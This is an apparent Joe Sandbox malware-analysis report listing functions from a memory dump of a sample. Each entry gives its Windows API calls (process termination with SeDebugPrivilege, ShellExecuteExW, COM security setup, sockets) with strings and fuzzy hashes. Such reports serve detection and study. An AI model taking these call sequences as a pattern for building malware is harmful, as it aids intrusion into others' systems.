                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                            • API String ID: 0-572801152
                                                            • Opcode ID: 4de7dd421ddf1df6062a553b5ca1a9e1b60484cb31be2a8ed54749064899fc44
                                                            • Instruction ID: 4deab19170bfd62a331397ef0d6809a76034e213ca61ada0b26a264dfc760885
                                                            • Opcode Fuzzy Hash: 4de7dd421ddf1df6062a553b5ca1a9e1b60484cb31be2a8ed54749064899fc44
                                                            • Instruction Fuzzy Hash: 3DC172B1A00219DBDF10DF68D884AAEB7F5FB48314F148669EA05A72C2E774AD45CB60
                                                            APIs
                                                              • Part of subcall function 006E710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E7044,80070057,?,?,?,006E7455), ref: 006E7127
                                                              • Part of subcall function 006E710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E7044,80070057,?,?), ref: 006E7142
                                                              • Part of subcall function 006E710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E7044,80070057,?,?), ref: 006E7150
                                                              • Part of subcall function 006E710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E7044,80070057,?), ref: 006E7160
                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00709806
                                                            • _memset.LIBCMT ref: 00709813
                                                            • _memset.LIBCMT ref: 00709956
                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00709982
                                                            • CoTaskMemFree.OLE32(?), ref: 0070998D
                                                            Strings
                                                            • NULL Pointer assignment, xrefs: 007099DB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                            • String ID: NULL Pointer assignment
                                                            • API String ID: 1300414916-2785691316
                                                            • Opcode ID: f02c82f9f0b5ef86a9910c99dc6d1d7a31ca6fb41b20180eb30e786189364c4b
                                                            • Instruction ID: ba2f941c005ef0996d195c0a7cc31e90806cb2d148b2698a7d7ac1fee75c6038
                                                            • Opcode Fuzzy Hash: f02c82f9f0b5ef86a9910c99dc6d1d7a31ca6fb41b20180eb30e786189364c4b
                                                            • Instruction Fuzzy Hash: 86913871D00229EBDF10DFA5DC41EDEBBB9AF48310F10815AF519A7291EB75AA44CFA0
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00716E24
                                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 00716E38
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00716E52
                                                            • _wcscat.LIBCMT ref: 00716EAD
                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00716EC4
                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00716EF2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window_wcscat
                                                            • String ID: SysListView32
                                                            • API String ID: 307300125-78025650
                                                            • Opcode ID: 8e34254790418f5cda614e3d56ad30441b9885aa9f5897bf79b30f74ed085240
                                                            • Instruction ID: dc2724c928bb8470eb41e8d074704e8875fa6c4676cde1940b565c1e43b17fa8
                                                            • Opcode Fuzzy Hash: 8e34254790418f5cda614e3d56ad30441b9885aa9f5897bf79b30f74ed085240
                                                            • Instruction Fuzzy Hash: 6A419E74A00348EBDF219F68CC85BEA77E9EF08350F10452AF984A72D1D6799DC88B64
                                                            APIs
                                                              • Part of subcall function 006F3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 006F3C7A
                                                              • Part of subcall function 006F3C55: Process32FirstW.KERNEL32(00000000,?), ref: 006F3C88
                                                              • Part of subcall function 006F3C55: CloseHandle.KERNEL32(00000000), ref: 006F3D52
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0070E9A4
                                                            • GetLastError.KERNEL32 ref: 0070E9B7
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0070E9E6
                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0070EA63
                                                            • GetLastError.KERNEL32(00000000), ref: 0070EA6E
                                                            • CloseHandle.KERNEL32(00000000), ref: 0070EAA3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                            • String ID: SeDebugPrivilege
                                                            • API String ID: 2533919879-2896544425
                                                            • Opcode ID: a7fdbbe4d6a81622d35d56c50edac61b6a737529b6ed0b3933a05cacb448d679
                                                            • Instruction ID: 78b0cf2cfa3b06736dd495b39459c9b084ed37154ee358bda4e8e31089dbcadf
                                                            • Opcode Fuzzy Hash: a7fdbbe4d6a81622d35d56c50edac61b6a737529b6ed0b3933a05cacb448d679
                                                            • Instruction Fuzzy Hash: AE418A713002019FDB15EF18CC95BAEB7E6AF45310F14C95CF9469B2D2DB79A804CB9A
                                                            APIs
                                                            • LoadIconW.USER32(00000000,00007F03), ref: 006F3033
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: IconLoad
                                                            • String ID: blank$info$question$stop$warning
                                                            • API String ID: 2457776203-404129466
                                                            • Opcode ID: 2b69aef462c04bd113e4605623df869346802e51295be7788110a0cff49b278d
                                                            • Instruction ID: c50a7fd48aed6e91d5e5fe04e3635a2831e61957b63fcd6b44394eb30a6cbed8
                                                            • Opcode Fuzzy Hash: 2b69aef462c04bd113e4605623df869346802e51295be7788110a0cff49b278d
                                                            • Instruction Fuzzy Hash: F611F37124839FBAE7549A59EC42CFF679D9F15320B20002BFA00A6381DF649F4156A5
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 006F4312
                                                            • LoadStringW.USER32(00000000), ref: 006F4319
                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 006F432F
                                                            • LoadStringW.USER32(00000000), ref: 006F4336
                                                            • _wprintf.LIBCMT ref: 006F435C
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 006F437A
                                                            Strings
                                                            • %s (%d) : ==> %s: %s %s, xrefs: 006F4357
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                            • API String ID: 3648134473-3128320259
                                                            • Opcode ID: f1753738ce0b21a53c5b3e41f6fdb2a954c94b5b5a81726194d87f480b0b93b2
                                                            • Instruction ID: c282b16699cdc3fe2e7a7f6dc6c7e3eae1192aec17874844d8627c4e1bdbd0e9
                                                            • Opcode Fuzzy Hash: f1753738ce0b21a53c5b3e41f6fdb2a954c94b5b5a81726194d87f480b0b93b2
                                                            • Instruction Fuzzy Hash: 380171F290020CBFD751A7949D89EE6766CD708300F0081A1FB05E2091EA785E854B74
                                                            APIs
                                                              • Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623
                                                            • GetSystemMetrics.USER32(0000000F), ref: 0071D47C
                                                            • GetSystemMetrics.USER32(0000000F), ref: 0071D49C
                                                            • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0071D6D7
                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0071D6F5
                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0071D716
                                                            • ShowWindow.USER32(00000003,00000000), ref: 0071D735
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0071D75A
                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 0071D77D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                            • String ID:
                                                            • API String ID: 1211466189-0
                                                            • Opcode ID: d64833fc6d6cc9ba507fddf96f1fdad447ac3e49080d95d4ee3f26795fc3048f
                                                            • Instruction ID: 118a959a938f1350613ccbdb319a65b34f29101727ce0671cb59e2f48af6104c
                                                            • Opcode Fuzzy Hash: d64833fc6d6cc9ba507fddf96f1fdad447ac3e49080d95d4ee3f26795fc3048f
                                                            • Instruction Fuzzy Hash: B9B15775600229EBDF24CF6CC9957E97BB1BF08711F08C169EC489A295D778AD90CFA0
                                                            APIs
                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,006CC1C7,00000004,00000000,00000000,00000000), ref: 00692ACF
                                                            • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,006CC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00692B17
                                                            • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,006CC1C7,00000004,00000000,00000000,00000000), ref: 006CC21A
                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,006CC1C7,00000004,00000000,00000000,00000000), ref: 006CC286
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow
                                                            • String ID:
                                                            • API String ID: 1268545403-0
                                                            • Opcode ID: e9d77d75c9873072b62870ba10d35a7ac9fd0beaa29ef93a8451d2f30bad72c3
                                                            • Instruction ID: 64cea03d6589147a9d79f8835632bb255dda2bd2807ca58bfcbac44e3029778e
                                                            • Opcode Fuzzy Hash: e9d77d75c9873072b62870ba10d35a7ac9fd0beaa29ef93a8451d2f30bad72c3
                                                            • Instruction Fuzzy Hash: 1541DD32604A81BACF358B288CACBFB7B9BEB55314F54C41DE04786EA1C679A946D710
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 006F70DD
                                                              • Part of subcall function 006B0DB6: std::exception::exception.LIBCMT ref: 006B0DEC
                                                              • Part of subcall function 006B0DB6: __CxxThrowException@8.LIBCMT ref: 006B0E01
                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 006F7114
                                                            • EnterCriticalSection.KERNEL32(?), ref: 006F7130
                                                            • _memmove.LIBCMT ref: 006F717E
                                                            • _memmove.LIBCMT ref: 006F719B
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 006F71AA
                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 006F71BF
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 006F71DE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 256516436-0
                                                            • Opcode ID: b73c2b35cd72cd6475e5c288c5b0630eadc6e2240354790ea07967b5d4c27fda
                                                            • Instruction ID: 1e699d15b1be2f54bd90bf61493c12c4f6c14519dbed44ac802c64fef3002611
                                                            • Opcode Fuzzy Hash: b73c2b35cd72cd6475e5c288c5b0630eadc6e2240354790ea07967b5d4c27fda
                                                            • Instruction Fuzzy Hash: A7316E71900205EBDB40DFA8DC85AEFBB79FF45310F1481B9E904AB286DB34DA55CB64
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 007161EB
                                                            • GetDC.USER32(00000000), ref: 007161F3
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007161FE
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0071620A
                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00716246
                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00716257
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0071902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00716291
                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007162B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                            • String ID:
                                                            • API String ID: 3864802216-0
                                                            • Opcode ID: b079fcb51907fcef59a38ad07da7752d9072b86691c2f4bf0b1d439ac214aaf6
                                                            • Instruction ID: 13cb825582aab943a7c8d5d7feb8780a68ce440978492ec67f8e676b6c5310f4
                                                            • Opcode Fuzzy Hash: b079fcb51907fcef59a38ad07da7752d9072b86691c2f4bf0b1d439ac214aaf6
                                                            • Instruction Fuzzy Hash: C1314F72101214BFEF118F58DC8AFEA3BA9FF49765F048065FE089A1D1D6799C41CB64
                                                            APIs
                                                              • Part of subcall function 00699837: __itow.LIBCMT ref: 00699862
                                                              • Part of subcall function 00699837: __swprintf.LIBCMT ref: 006998AC
                                                              • Part of subcall function 006AFC86: _wcscpy.LIBCMT ref: 006AFCA9
                                                            • _wcstok.LIBCMT ref: 006FEC94
                                                            • _wcscpy.LIBCMT ref: 006FED23
                                                            • _memset.LIBCMT ref: 006FED56
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                            • String ID: X
                                                            • API String ID: 774024439-3081909835
                                                            • Opcode ID: 73e550f0331c2dbe56c71697c6ed2ef1a0c010dc647b64cb3fed726e63122da5
                                                            • Instruction ID: e3c17126926c3aff4f17a979471595ddb40f6cfbdb77c53ca58957974a006fa8
                                                            • Opcode Fuzzy Hash: 73e550f0331c2dbe56c71697c6ed2ef1a0c010dc647b64cb3fed726e63122da5
                                                            • Instruction Fuzzy Hash: 77C1B3705083449FCB94EF24C841AAABBE6FF85310F00492DF999877A2DB31EC45CB56
                                                            APIs
                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00706C00
                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00706C21
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00706C34
                                                            • htons.WSOCK32(?,?,?,00000000,?), ref: 00706CEA
                                                            • inet_ntoa.WSOCK32(?), ref: 00706CA7
                                                              • Part of subcall function 006EA7E9: _strlen.LIBCMT ref: 006EA7F3
                                                              • Part of subcall function 006EA7E9: _memmove.LIBCMT ref: 006EA815
                                                            • _strlen.LIBCMT ref: 00706D44
                                                            • _memmove.LIBCMT ref: 00706DAD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                            • String ID:
                                                            • API String ID: 3619996494-0
                                                            • Opcode ID: 026ddaea038ea30cc8dadb2bbd3f81789ce22d28dd6cef76794f55902e12bd53
                                                            • Instruction ID: 7f3238ef2da9cf88bb8cc7d71788fa682cfec942517b1ab6e15eaa48253e8af3
                                                            • Opcode Fuzzy Hash: 026ddaea038ea30cc8dadb2bbd3f81789ce22d28dd6cef76794f55902e12bd53
                                                            • Instruction Fuzzy Hash: 9281C2B1204300EFDB50EB28CC92E6BB7EAAF84714F104A1DF5559B2D2DA74ED05CBA5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d2682077bb806cb7e71ef99a02f2805f97d2334584a1d8765f42f4b8f66310f5
                                                            • Instruction ID: f86fa98d22123a133208edec5d7ee49c5106d69a33be231effd553be0b66a08e
                                                            • Opcode Fuzzy Hash: d2682077bb806cb7e71ef99a02f2805f97d2334584a1d8765f42f4b8f66310f5
                                                            • Instruction Fuzzy Hash: C2714C7090010AEFCF049F98CC45EFEBBBAFF8A714F248159F915AA251C734AA51CB64
                                                            APIs
                                                            • IsWindow.USER32(00D26AD0), ref: 0071B3EB
                                                            • IsWindowEnabled.USER32(00D26AD0), ref: 0071B3F7
                                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0071B4DB
                                                            • SendMessageW.USER32(00D26AD0,000000B0,?,?), ref: 0071B512
                                                            • IsDlgButtonChecked.USER32(?,?), ref: 0071B54F
                                                            • GetWindowLongW.USER32(00D26AD0,000000EC), ref: 0071B571
                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0071B589
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                            • String ID:
                                                            • API String ID: 4072528602-0
                                                            • Opcode ID: e1670364bd8c59ddc82c33017b12c2e5fcac54e1040a9fdcf459fa95c450f1bd
                                                            • Instruction ID: f706dfdb321bbf4018bb0ac22f1439d8ac029b7612f84cef79c0849d9b2fb956
                                                            • Opcode Fuzzy Hash: e1670364bd8c59ddc82c33017b12c2e5fcac54e1040a9fdcf459fa95c450f1bd
                                                            • Instruction Fuzzy Hash: 8B719C38600244EFDB209FA9C894FFA7BB9EF09310F148069ED55972E2C779AD90CB50
                                                            APIs
                                                            • _memset.LIBCMT ref: 0070F448
                                                            • _memset.LIBCMT ref: 0070F511
                                                            • ShellExecuteExW.SHELL32(?), ref: 0070F556
                                                              • Part of subcall function 00699837: __itow.LIBCMT ref: 00699862
                                                              • Part of subcall function 00699837: __swprintf.LIBCMT ref: 006998AC
                                                              • Part of subcall function 006AFC86: _wcscpy.LIBCMT ref: 006AFCA9
                                                            • GetProcessId.KERNEL32(00000000), ref: 0070F5CD
                                                            • CloseHandle.KERNEL32(00000000), ref: 0070F5FC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                            • String ID: @
                                                            • API String ID: 3522835683-2766056989
                                                            • Opcode ID: 700d3a92f87019d79247b1c01264190ca5d48a84243c514e8adb7135029146e5
                                                            • Instruction ID: 26cb24fd5de850358d5fcf44b5bd5034a2040b0f81d7d5c2bf8e49229de8797f
                                                            • Opcode Fuzzy Hash: 700d3a92f87019d79247b1c01264190ca5d48a84243c514e8adb7135029146e5
